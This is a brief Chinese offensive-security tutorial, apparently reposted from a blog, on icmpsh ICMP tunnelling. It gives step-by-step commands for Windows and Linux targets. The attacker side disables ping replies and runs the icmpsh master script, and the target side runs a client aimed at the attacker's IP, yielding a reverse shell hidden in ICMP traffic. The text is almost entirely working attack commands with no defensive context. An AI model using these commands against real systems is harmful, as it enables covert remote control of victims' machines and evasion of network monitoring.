icmspsh隧道

利用

当不知道对方公网ip可使用tcpdump对icmp包进行抓取,目标机器ping攻击机ip即可

windows

攻击机:
必须开启禁ping,才可通过icmp反弹shell
sysctl -w net.ipv4.icmp_echo_ignore_all=1

git clone https://github.com/inquisb/icmpsh.git
./icmpsh_m.py  192.168.3.130 192.168.3.142  (攻击机IP 目标IP)

目标机:
icmpsh.exe  -t 192.168.3.130  -d 500 -b 30  -s 128

补充帮助信息:
-d milliseconds 以毫秒为单位的请求之间的延迟 (默认 200)
-b num 最大空白数 (未答复的ICMP请求)
-s bytes 以字节为单位的最大数据缓冲区大小 (默认 64 字节)

攻击机接收到反弹shell:

连接的通信均为icmp协议传输:

Linux

执行前要保证是root权限,或者 net.ipv4.ping_group_range /proc/sys/ 允许在其他用户上运行。
目标机:
git clone https://github.com/ewilded/icmpsh-s-linux.git  (客户端)
cd icmpsh-s-linux/
gcc icmpsh-s-linux.c -o icmpsh-s-linux
./icmpsh-s-linux -t 192.168.3.135 -v

攻击机:
./icmpsh_m.py  192.168.3.130 192.168.3.135 (攻击机IP 目标IP)

目标机建立连接如下:

攻击机执行命令如下:

连接的通信均为icmp协议传输:

原文地址:https://www.cnblogs.com/Yang34/p/14248964.html